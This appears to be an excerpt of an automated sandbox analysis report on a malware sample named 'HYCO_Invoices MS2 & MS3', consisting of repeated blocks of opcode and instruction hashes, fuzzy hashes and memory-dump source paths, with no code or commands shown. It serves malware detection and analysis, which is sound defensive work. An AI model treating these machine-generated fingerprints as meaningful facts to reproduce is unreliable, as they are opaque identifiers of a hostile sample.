                                                                                                                                        • Opcode Fuzzy Hash: 8994cd748e4cb3f9007124ad225c93e8c66cab61f69807487b92533de6048a5f
                                                                                                                                        • Instruction Fuzzy Hash: 5C115E7154122DABEF69AB64CD41FE9B2B8BF44710F5041D4A358EA0E0DB719E81DF84
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: c0ec4d266471c9547166acc1fd1eb763428ac71706b94ce862d4cb5f0fc29682
                                                                                                                                        • Instruction ID: 9435f0f96ec1ef729106d10645b2e9a7a4bc0335552aa16e9800d0f355f59dc8
                                                                                                                                        • Opcode Fuzzy Hash: c0ec4d266471c9547166acc1fd1eb763428ac71706b94ce862d4cb5f0fc29682
                                                                                                                                        • Instruction Fuzzy Hash: 52014C7160412567EF259B15C805BDF7FA4DB40B50F044095FE866B2C0D7B6DC80C3E0
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                                                                                        • Instruction ID: d5af4142a685f74714232bd9b454d111506e21c6b0af5ddfa0fa14b53d9758fa
                                                                                                                                        • Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                                                                                        • Instruction Fuzzy Hash: 7D012833A001158BDF519A5DD8C0BA27766BFD4710F5544E5EE41CF256EE71CC81E790
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: b076537cd85a5420a2d55a182100b3c7e1f84c2cbd523f212a089d053ba9debf
                                                                                                                                        • Instruction ID: 8b3a99355ce9d506925ca1b267b06d163401edcf7b87098c4ef40568e1c0d304
                                                                                                                                        • Opcode Fuzzy Hash: b076537cd85a5420a2d55a182100b3c7e1f84c2cbd523f212a089d053ba9debf
                                                                                                                                        • Instruction Fuzzy Hash: 10111B7290001DABDB16DB94CC84DDF77BCEF48254F044166E946A7211EA35AA15CBE0
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 7ab54fe823b1def229fd4fa6599ab9daa08162a50b4591224b5090936310a230
                                                                                                                                        • Instruction ID: b6467708b9b8abe6cfd043c301db0e1921e29fc04bb7904a8fbbad37dac830d7
                                                                                                                                        • Opcode Fuzzy Hash: 7ab54fe823b1def229fd4fa6599ab9daa08162a50b4591224b5090936310a230
                                                                                                                                        • Instruction Fuzzy Hash: EA11CE326081469FD311DF18C800BA6BBF9FB5A304F098199E8C88F315D732EC80CBA0
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: fe44f2699ccc881f39b1b827c1a08e7226c183fb2b142b237ba5e6c0469b9e05
                                                                                                                                        • Instruction ID: dc88720cfd6583bcd8dc9cdf87921d8b312d7019dbc537ba09a1569fcb180a7b
                                                                                                                                        • Opcode Fuzzy Hash: fe44f2699ccc881f39b1b827c1a08e7226c183fb2b142b237ba5e6c0469b9e05
                                                                                                                                        • Instruction Fuzzy Hash: 0A11ECB1E0021A9FDB04DFA9D541A9EB7F8FF58350F10806AB945EB351D674EA018BA4
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                                                                                        • Instruction ID: 37a8816d9a21c9301f8dc287f8e97f087fc6a376508cdea127409e77113c495c
                                                                                                                                        • Opcode Fuzzy Hash: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                                                                                        • Instruction Fuzzy Hash: EE01F532100745DFDB3296AAC840BA777E9FFE5710F04882AE686CB540DE70E402DB90
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 265c12beccc33dd4d0b34112336fbbb931c985aa058b078a1bd813ba6c28290b
                                                                                                                                        • Instruction ID: b792b70f42c0408f3cdeff1404193137dfc1c1cc81f8307961d4d626bcccd3b1
                                                                                                                                        • Opcode Fuzzy Hash: 265c12beccc33dd4d0b34112336fbbb931c985aa058b078a1bd813ba6c28290b
                                                                                                                                        • Instruction Fuzzy Hash: 3B116D75A0020DEFDB05EF64D951AAE7BB9EB94740F004099E9819B290DA35EE11CB90
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 5c243971dc93af7534f14fca8f544980bb1c3cebdfdfdb7867a8469b71261af7
                                                                                                                                        • Instruction ID: c1374293626c87247527a21b64b6da312fe49902d69ac260368ec5eb7d50fe9e
                                                                                                                                        • Opcode Fuzzy Hash: 5c243971dc93af7534f14fca8f544980bb1c3cebdfdfdb7867a8469b71261af7
                                                                                                                                        • Instruction Fuzzy Hash: 5301F771200906BFE312AB79CD44E97B7ECFF94654F000625B14587590DB35EC51C6E0
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 88bb288d43abd3cda97b53416f812598123da2f44a03aa716f7f2d0ea15b21d2
                                                                                                                                        • Instruction ID: 8fb8c3f53d9027cc54e8f655037fb5ad119414c57549c9d2bf9fbc673ee24454
                                                                                                                                        • Opcode Fuzzy Hash: 88bb288d43abd3cda97b53416f812598123da2f44a03aa716f7f2d0ea15b21d2
                                                                                                                                        • Instruction Fuzzy Hash: AC01F032218216DFD320EF79D4449A7FBE8FF94660F114119E9D98B2C0D7359901CBD1
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 9b327fedc4110a94ff51d25ec86b64a7b658ad6dba80c894d34a90ed790a6ac8
                                                                                                                                        • Instruction ID: 6793ef635be08f8fd87c74203b3b1d0d09bf95dcabfa67cdb1405d6ee9250645
                                                                                                                                        • Opcode Fuzzy Hash: 9b327fedc4110a94ff51d25ec86b64a7b658ad6dba80c894d34a90ed790a6ac8
                                                                                                                                        • Instruction Fuzzy Hash: 15115B75A0020EEBEB15EF68C944EEE7BB9FB98240F004059B9819B380DA35ED11CB94
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 48cdc77292bc065cd55e299e8d033ff4f6ab809ffa1f323e5621d31c0cc81bd5
                                                                                                                                        • Instruction ID: 3597cb543621b858267bd8fe64f4004db2540996dac54a64619f3e3e33772ffb
                                                                                                                                        • Opcode Fuzzy Hash: 48cdc77292bc065cd55e299e8d033ff4f6ab809ffa1f323e5621d31c0cc81bd5
                                                                                                                                        • Instruction Fuzzy Hash: 40117CB16143099FC700DF69D54199BBBE8EF98710F00851AB998DB390D634E900CB96
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 980cb63dee44520d49ac7e191b954d5d100561d1446af6e0b37a670729ca12b5
                                                                                                                                        • Instruction ID: c869b001fdd0bf1580ce7af9b9b99a87e8791d25598d3b5c38850b372ca02282
                                                                                                                                        • Opcode Fuzzy Hash: 980cb63dee44520d49ac7e191b954d5d100561d1446af6e0b37a670729ca12b5
                                                                                                                                        • Instruction Fuzzy Hash: 54117CB16143099FC300DF69D54198BBBE8FF99750F00851AB998DB390E634E900CB96
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 4be238ecb871e70af7da4c9819feb513cc5cd9ee9a4f29187abed574232cbb68
                                                                                                                                        • Instruction ID: 3626ea5ac01472745824d05a1214a0158606794946491104c3c10ff3aa2387f9
                                                                                                                                        • Opcode Fuzzy Hash: 4be238ecb871e70af7da4c9819feb513cc5cd9ee9a4f29187abed574232cbb68
                                                                                                                                        • Instruction Fuzzy Hash: 0801D8322006069FE7219B9DD854F9BB7E6FBC5B10F04485DE682CB650DA70F841CB54
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                                                                                        • Instruction ID: 2494112b914287f9b81cd23599ff4716433428145d098bf35d91de92d1d17e49
                                                                                                                                        • Opcode Fuzzy Hash: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                                                                                        • Instruction Fuzzy Hash: 09017CB22005809FE323D61DC948F6B7BDCEB49754F0948F2FA85DB6E1D668DC80C625
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: df688431fe232358dca95848439d2f278cf47e96ea50ffea9b523675d304ad15
                                                                                                                                        • Instruction ID: 8b5b764986ba68802d9885c6ee6de7ec875fc8dbe4fcdc8bcfb994e091ceb28d
                                                                                                                                        • Opcode Fuzzy Hash: df688431fe232358dca95848439d2f278cf47e96ea50ffea9b523675d304ad15
                                                                                                                                        • Instruction Fuzzy Hash: 9F01D432B005459BC714EB77D801AAAB7A9EF80760B1580699A459B680DE30ED02D290
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 63f755deffb851adb29220bb81293ce2111f68e89b5b1d5f49fe115c39e81da6
                                                                                                                                        • Instruction ID: b04921167541925f3977b3a301d9185737a95295dc9bfc979c555ee28132a32f
                                                                                                                                        • Opcode Fuzzy Hash: 63f755deffb851adb29220bb81293ce2111f68e89b5b1d5f49fe115c39e81da6
                                                                                                                                        • Instruction Fuzzy Hash: A4F02D33741B28B7C732DB5A8C40F57BAADEF84B90F184028B64597650DA34DD01DBA0
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                                                                                        • Instruction ID: d6163b222eda9e195b26d77d13235184806b411bdcc3f27521d91d138db32165
                                                                                                                                        • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                                                                                        • Instruction Fuzzy Hash: CAF0C2B2600A15ABE325CF4DDD40E57FBEEDBD5B80F048168B585C7220EA31DD04CB90
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                                                                                        • Instruction ID: df22e08a4d37acc32967f11d1056cbd9d0daf53f400869cedb26dffeb2882789
                                                                                                                                        • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                                                                                        • Instruction Fuzzy Hash: 79F0F673644AA29FD732165B4840B6BB6959FD1BA4F2A4035F209DB240CA648C03B7D1
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                                                                                                        • Instruction ID: 2887700b8ab9ad35a67427f6a4d2f5f23dafc5d1d2ce93ce930e2d1b27ddd09e
                                                                                                                                        • Opcode Fuzzy Hash: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                                                                                                        • Instruction Fuzzy Hash: 0301F4322006859FE723971DC905F9EBFDCEF51754F0880A6FA848F6A1DA78C800C211
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: cef0df1699c898f8c10a398a557712e2727af175b8a2af60e59699f4b3e5b490
                                                                                                                                        • Instruction ID: 3c1b69931befebe8a640c25a8cbff0dfcc72ab92c4a3ab32a41fbb6b2c42a2ef
                                                                                                                                        • Opcode Fuzzy Hash: cef0df1699c898f8c10a398a557712e2727af175b8a2af60e59699f4b3e5b490
                                                                                                                                        • Instruction Fuzzy Hash: 13018F71A002499FDB00DFA9D441AEEBBF8BF58710F14406AF540EB390D738EA01CB94
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                                                                                        • Instruction ID: 5c56ce40c3f647bef9fc31611cbb19c313ebfed12f529824c7379bd831e7902f
                                                                                                                                        • Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                                                                                        • Instruction Fuzzy Hash: A6F01D7220001DBFEF029F94DD80DEF7B7EFB59298B104125FA11A6160D636DD21ABA0
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: b97a6165d6d1860ad0760af208777c5f7f196b3e01779bccad834834d966204d
                                                                                                                                        • Instruction ID: d41e5e68aff4eecbad156d380c9cd7768924b8d30febb92cbca119d3f43254ce
                                                                                                                                        • Opcode Fuzzy Hash: b97a6165d6d1860ad0760af208777c5f7f196b3e01779bccad834834d966204d
                                                                                                                                        • Instruction Fuzzy Hash: 4FF02B727043825BE314A51B9D02F723295DBD0760F29807AF7058B2D3F979DC02A7D4
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: b21d3e831fe545a98b84ad30c883cb244d7309a6c6307292f67abd426d95013b
                                                                                                                                        • Instruction ID: c7f8609f9700d61463af307d19c19bcb2e6e011d22cd34e9ac29254fcc4e538e
                                                                                                                                        • Opcode Fuzzy Hash: b21d3e831fe545a98b84ad30c883cb244d7309a6c6307292f67abd426d95013b
                                                                                                                                        • Instruction Fuzzy Hash: 2B018170204695DFF373AB2CCD48B6A37E8AB50B04F484590FAC1CF6D6D729D4418210
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                                                                        • Instruction ID: 88166244a008bba0c911c7d33cba88acd59ece7d47132dc424f2da5d50a196ce
                                                                                                                                        • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                                                                        • Instruction Fuzzy Hash: 4DF0E931341D1347EFB6AA3E8970B2EBAD5AF90A01B05C56C99C5DB680DF60DC029780
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                                                                                                        • Instruction ID: f45269e6265ced5b86624b97109614bb118bd7e04938764ba0a2aee3401a23c3
                                                                                                                                        • Opcode Fuzzy Hash: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                                                                                                        • Instruction Fuzzy Hash: B1F05432B125119FE3A29A4DCC80F16B7A8AFD5A60F5900F5A6489F260C760EC0187E4
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: da0f062362cd5ef13977323be0e4b3712450fcfa6d5ef2d053876e50dbe7f482
                                                                                                                                        • Instruction ID: 1784a15fcfdd96ccc697b4625de433866be309c92e1ba393e93233f28648538c
                                                                                                                                        • Opcode Fuzzy Hash: da0f062362cd5ef13977323be0e4b3712450fcfa6d5ef2d053876e50dbe7f482
                                                                                                                                        • Instruction Fuzzy Hash: 3AF0AF706153459FD350EF28C542A1BB7E4FF98710F40865AB8D8DB390EA38E900C796
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                                                                                                        • Instruction ID: daf9d9a434ba84ab0a32e8a6cd547a1820efc56f3516de2b70af944c27bd6e5b
                                                                                                                                        • Opcode Fuzzy Hash: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                                                                                                        • Instruction Fuzzy Hash: 7FF0BE72610204AFE724DB26CC05F97B6E9EF98340F148079E9C5D72A4FAF1EE01D6A4
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 32ef610a1eb73c32cf103f0e676e881a8fdf2f22a66a87b5f9cc385e353c458b
